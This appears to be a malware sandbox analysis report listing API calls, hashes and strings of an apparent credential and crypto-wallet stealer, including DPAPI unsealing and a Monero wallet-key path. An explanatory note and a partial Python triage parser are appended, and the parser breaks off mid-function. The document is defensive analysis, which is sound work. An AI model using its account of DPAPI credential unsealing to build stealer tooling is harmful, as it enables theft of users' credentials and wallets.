                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: R)|$[e_'$^n~o$aHu[$u5\
                                • API String ID: 0-1803858425
                                • Opcode ID: ae5afb6835e7f1de1c1cffb63ac6687990b40bd870b4c2cf3fce931e9ef0864a
                                • Instruction ID: 70e442f8b6309f5a2398b73ea3ec85b0e86e1b5fa682928c404b74ae18832ae0
                                • Opcode Fuzzy Hash: ae5afb6835e7f1de1c1cffb63ac6687990b40bd870b4c2cf3fce931e9ef0864a
                                • Instruction Fuzzy Hash: DAB219F360C204AFE3046E6DEC8566AFBE9EF94620F1A493DE6C4C7344E93598018697
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00D8C871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00D8C87C
                                • lstrcat.KERNEL32(?,00DA0B46), ref: 00D8C943
                                • lstrcat.KERNEL32(?,00DA0B47), ref: 00D8C957
                                • lstrcat.KERNEL32(?,00DA0B4E), ref: 00D8C978
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: 4cd1a3379ebf2d69610426750a157bb07a656c37bf98aa209a64313e7b94c8ec
                                • Instruction ID: 418c77c9b8185c35a13bad937aef3fbab51b18102c34681eea8a8d77e0743d6b
                                • Opcode Fuzzy Hash: 4cd1a3379ebf2d69610426750a157bb07a656c37bf98aa209a64313e7b94c8ec
                                • Instruction Fuzzy Hash: D4415EB591421DDFDB10DFA4CD89FEEB7B8BB48704F1041A8E509A7280D7746A84DFA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00D8724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D87254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00D87281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00D872A4
                                • LocalFree.KERNEL32(?), ref: 00D872AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: e9066396748043f7096416e1a9382062ef9ba7936fab287b8459a6e6ac1bd0e5
                                • Instruction ID: 5e9a734ff94fcbd1e609e7c0d9df7dcc97943d180b413e3193f6efd1c0958760
                                • Opcode Fuzzy Hash: e9066396748043f7096416e1a9382062ef9ba7936fab287b8459a6e6ac1bd0e5
                                • Instruction Fuzzy Hash: 7B011EB5A4020CBBEB10DFE4CD4AF9E77B8EB44B04F204155FB05AB2C0D6B0BA009B65
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D9961E
                                • Process32First.KERNEL32(00DA0ACA,00000128), ref: 00D99632
                                • Process32Next.KERNEL32(00DA0ACA,00000128), ref: 00D99647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 00D9965C
                                • CloseHandle.KERNEL32(00DA0ACA), ref: 00D9967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: c6c7dc90f65e23de587ac5fbe5266650bfd507188d3aa9b5c98398416c987c02
                                • Instruction ID: b4ecca80aaacc5ce267ac4fce49f43f489c7cbd6c793a23085110e986bb0b6d1
                                • Opcode Fuzzy Hash: c6c7dc90f65e23de587ac5fbe5266650bfd507188d3aa9b5c98398416c987c02
                                • Instruction Fuzzy Hash: 3501E975A0020CABCF14DFA5C959BEDBBF8AB48304F104188A90597280D734AA40DF61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: M)}|$TY9z$jF~$l^?w
                                • API String ID: 0-1276393754
                                • Opcode ID: 40074a63bb0efb8783f982efeea53445cc4432f9d9f77e9312294dc35f29545b
                                • Instruction ID: 1740bc45df546e2a739b7197fbd331c024f7e3ec501a5214430108e7097593af
                                • Opcode Fuzzy Hash: 40074a63bb0efb8783f982efeea53445cc4432f9d9f77e9312294dc35f29545b
                                • Instruction Fuzzy Hash: DF92C3F360C214AFE704AE2DEC8566AFBE5EF98720F16492DE6C4C3744E63598408797
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00DA05B7), ref: 00D986CA
                                • Process32First.KERNEL32(?,00000128), ref: 00D986DE
                                • Process32Next.KERNEL32(?,00000128), ref: 00D986F3
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                • CloseHandle.KERNEL32(?), ref: 00D98761
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: bfec094896900c70709378741e65054557d094ee52658d6b2c1f634c41cc7793
                                • Instruction ID: 764022ba21a6a52245eadbf506ba41a3061d3c4ce22a5a4fab885e135044c363
                                • Opcode Fuzzy Hash: bfec094896900c70709378741e65054557d094ee52658d6b2c1f634c41cc7793
                                • Instruction Fuzzy Hash: 26314872911228ABCF24EF99DD46FEEB778FF45700F104199E10AA61A0DB306A45CFB1
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00D85184,40000001,00000000,00000000,?,00D85184), ref: 00D98EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 0195800ddeccc93b7dbd6b1385fc56172909b8b21a8b130213627e36684020e5
                                • Instruction ID: 24cf706bab8c2796f6ffcfd2a04c63fe607e648e62945607a5882980dd85b916
                                • Opcode Fuzzy Hash: 0195800ddeccc93b7dbd6b1385fc56172909b8b21a8b130213627e36684020e5
                                • Instruction Fuzzy Hash: 33111870200208BFDF04CF64D889FAB73A9AF8AB04F14A458F9198B250DB35EC41EB70
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D84EEE,00000000,00000000), ref: 00D89AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00D84EEE,00000000,?), ref: 00D89B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D84EEE,00000000,00000000), ref: 00D89B2A
                                • LocalFree.KERNEL32(?,?,?,?,00D84EEE,00000000,?), ref: 00D89B3F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                 • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: 9a4632aade4f09f65a333aead1f018cccf8a24a789250f48a98a0ff34e454fad
                                • Instruction ID: 1909e625cda24993bb9210e19a94ea24ca201678d64e20f615b79539f59f4953
                                • Opcode Fuzzy Hash: 9a4632aade4f09f65a333aead1f018cccf8a24a789250f48a98a0ff34e454fad
                                • Instruction Fuzzy Hash: 1911D4B4241208AFEB00CF64CC95FAAB7B5FB89704F248048F9159B3D0C771A901DB50
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00DA0E00,00000000,?), ref: 00D979B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D979B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00DA0E00,00000000,?), ref: 00D979C4
                                • wsprintfA.USER32 ref: 00D979F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                 • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 6693e3aad6b42ae4a0c29a68ba357d930ac1ff6631d843d2c619fbc5b17ec257
                                • Instruction ID: 486bb269b103cd2cd27824dcdcc03dc5bd5596308b204327fb14cdefef46bd1d
                                • Opcode Fuzzy Hash: 6693e3aad6b42ae4a0c29a68ba357d930ac1ff6631d843d2c619fbc5b17ec257
                                • Instruction Fuzzy Hash: 8C1118B2904118ABCB149FD9DE45FBEB7F8EB48B15F10411AF645A2280D2395940D7B1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0182DFE8,00000000,?,00DA0E10,00000000,?,00000000,00000000), ref: 00D97A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D97A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0182DFE8,00000000,?,00DA0E10,00000000,?,00000000,00000000,?), ref: 00D97A7D
                                • wsprintfA.USER32 ref: 00D97AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                 • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: d80559edaf679485c08100300eb70c3058218f0bd7de0ebb1224d449397279f9
                                • Instruction ID: 2af6633b92f789dc6a1483962024904adfdf0cc5db31e566c9af8401f29076ca
                                • Opcode Fuzzy Hash: d80559edaf679485c08100300eb70c3058218f0bd7de0ebb1224d449397279f9
                                • Instruction Fuzzy Hash: 42118EB194521CEFEB208B54DD4AFA9BB78FB04725F10439AE90A932C0C7746A44CFA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                 • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 3|u<$k~s$z
                                • API String ID: 0-935043890
                                • Opcode ID: 5bd068bd3b91c6f6aac5ca66abfe40ea1f9386f947c32e019fdf8dc32ea93273
                                • Instruction ID: d9b3838cfb3ac40fa35f9be4d44db6c96db3478bddf7256ff94a32afb792c3aa
                                • Opcode Fuzzy Hash: 5bd068bd3b91c6f6aac5ca66abfe40ea1f9386f947c32e019fdf8dc32ea93273
                                • Instruction Fuzzy Hash: 9DB24AF360C2009FE304AE2DEC8567ABBE9EF94360F1A853DE6C4C7744E63599058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                 • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: jQQk$~>{$|nW
                                • API String ID: 0-3171528340
                                • Opcode ID: 59aac489a0b8e4cdce8caab03d3add18bf0716312478a06ba45a62584b34fed5
                                • Instruction ID: 99540ec53c632ee50bb5f8df3014aa2013eee583361b73594cc0a360d4dd2cda
                                • Opcode Fuzzy Hash: 59aac489a0b8e4cdce8caab03d3add18bf0716312478a06ba45a62584b34fed5
                                • Instruction Fuzzy Hash: 437219F360C2049FE3046E2DEC8567ABBE9EBD4720F1A453DEAC5C3744EA3598058697
                                APIs
                                • CoCreateInstance.COMBASE(00D9E118,00000000,00000001,00D9E108,00000000), ref: 00D93758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00D937B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                 • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: 6667240708ffc8fa0c8eeeb4a9a3ac80d7a1c022f149fa3125a0fe4f7614953b
                                • Instruction ID: 591afe27dea127bd6a25728e5f26b00b9492eae9b270da9a30a9e1531764fb6e
                                • Opcode Fuzzy Hash: 6667240708ffc8fa0c8eeeb4a9a3ac80d7a1c022f149fa3125a0fe4f7614953b
                                • Instruction Fuzzy Hash: 8341D670A40A28AFDB24DB58CC95B9BB7B5BB48702F5041D8A608E72D0D771AE85CF60
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00D89B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00D89BA3
                                • LocalFree.KERNEL32(?), ref: 00D89BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                 • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: dea3ec63e43c39464f460a8a21dda7c8158cf9026ecc3eb42d3c1fd89a9fcf84
                                • Instruction ID: 91491131d1d549ab08d82d3f09eeaf25398cbaed82b9240b87927057a7f237ad
                                • Opcode Fuzzy Hash: dea3ec63e43c39464f460a8a21dda7c8158cf9026ecc3eb42d3c1fd89a9fcf84
                                • Instruction Fuzzy Hash: C711A5B8A00209EFDB04DF94D985EAEB7B5FF88304F144598E915A7390D774AE11CBA1
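The two crypt32 fragments above are worth reading as a pair: the CryptStringToBinaryA / LocalAlloc / CryptStringToBinaryA / LocalFree sequence at call sites 00D89AEF..00D89B3F base64-decodes a text blob into a zeroed buffer (dwFlags 1 is CRYPT_STRING_BASE64, LocalAlloc 0x40 is LPTR), and the CryptUnprotectData / LocalAlloc / LocalFree sequence at 00D89B84..00D89BD3 hands a binary blob to DPAPI with no entropy, no prompt and dwFlags 0, which is exactly the call a process running in the victim's logon session needs to unseal user-scope DPAPI blobs without any further secret. The helper below is an added example, not part of the Joe Sandbox report or of the sample: it parses the report's "APIs" lines (the two fragments are embedded verbatim as sample input), decodes the flag words the report recovered as immediates, and flags the Win32 size-then-fill idiom that the repeated CryptStringToBinaryA around LocalAlloc represents. The regular expression, the constant tables and the parse_api_lines / describe / size_then_fill / analyze names are the example's own. Caveat a practitioner should keep in mind: Joe Sandbox argument values are partly static ("?" marks values it did not recover), so only immediates such as the flag words should be trusted; the 00000000 in the pbBinary slot of both CryptStringToBinaryA lines is not evidence that the second call is also a size query.

```python
"""
Added triage helper (not part of the Joe Sandbox report): parse the "APIs"
lines of a function entry and annotate the argument values that matter.
Report argument values are partly static; "?" means not recovered.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed samples: the "APIs" lines of the two crypt32 fragments,
# copied from the report (call sites 00D89AEF..00D89B3F and 00D89B84..00D89BD3).
FRAGMENT_BASE64 = """\
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D84EEE,00000000,00000000), ref: 00D89AEF
• LocalAlloc.KERNEL32(00000040,?,?,?,00D84EEE,00000000,?), ref: 00D89B01
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D84EEE,00000000,00000000), ref: 00D89B2A
• LocalFree.KERNEL32(?,?,?,?,00D84EEE,00000000,?), ref: 00D89B3F
"""
FRAGMENT_DPAPI = """\
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00D89B84
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00D89BA3
• LocalFree.KERNEL32(?), ref: 00D89BD3
"""

# "• Api.MODULE(arg,arg,...), ref: ADDR"; the argument list is optional
# (the report prints e.g. "wsprintfA.USER32 ref: 00D979F3" without one).
_LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# CryptStringToBinaryA dwFlags: the low byte selects the input encoding.
CRYPT_STRING = {0x0: "CRYPT_STRING_BASE64HEADER", 0x1: "CRYPT_STRING_BASE64",
                0x4: "CRYPT_STRING_HEX", 0x6: "CRYPT_STRING_BASE64_ANY",
                0x7: "CRYPT_STRING_ANY"}
# LocalAlloc uFlags.
LMEM = {0x00: "LMEM_FIXED", 0x02: "LMEM_MOVEABLE",
        0x40: "LPTR (LMEM_FIXED | LMEM_ZEROINIT)",
        0x42: "LHND (LMEM_MOVEABLE | LMEM_ZEROINIT)"}
ALLOCATORS = {"LocalAlloc", "GlobalAlloc", "HeapAlloc", "RtlAllocateHeap", "VirtualAlloc"}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple          # int for a recovered value, None for "?"
    ref: int             # call-site address


def parse_api_lines(text: str) -> list:
    """Turn the APIs block of one function entry into ApiCall records, in order."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        parts = [p.strip() for p in raw.split(",")] if raw else []
        args = tuple(None if p == "?" else int(p, 16) for p in parts)
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls


def describe(c: ApiCall) -> Optional[str]:
    """One triage note for a call whose recovered immediates say something, else None."""
    a = c.args
    if c.api == "CryptStringToBinaryA" and len(a) > 2 and a[2] is not None:
        enc = CRYPT_STRING.get(a[2] & 0xFF, "unknown encoding")
        return f"{c.ref:08X}: CryptStringToBinaryA dwFlags=0x{a[2]:X} ({enc}): text blob decoded to bytes"
    if c.api == "LocalAlloc" and a and a[0] is not None:
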